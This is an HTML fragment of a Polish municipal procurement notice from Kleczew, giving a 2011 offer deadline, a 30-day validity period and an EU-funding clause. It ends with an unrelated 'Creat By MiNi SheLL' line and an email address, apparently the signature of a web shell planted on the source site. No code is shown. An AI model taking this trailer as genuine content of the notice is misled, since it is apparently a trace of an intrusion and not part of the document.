<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2011 godzina 09:00, miejsce: Urząd Gminy i Miasta w Kleczewie
Pl. Kościuszki 5, 62-540 Kleczew
sekretariat Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com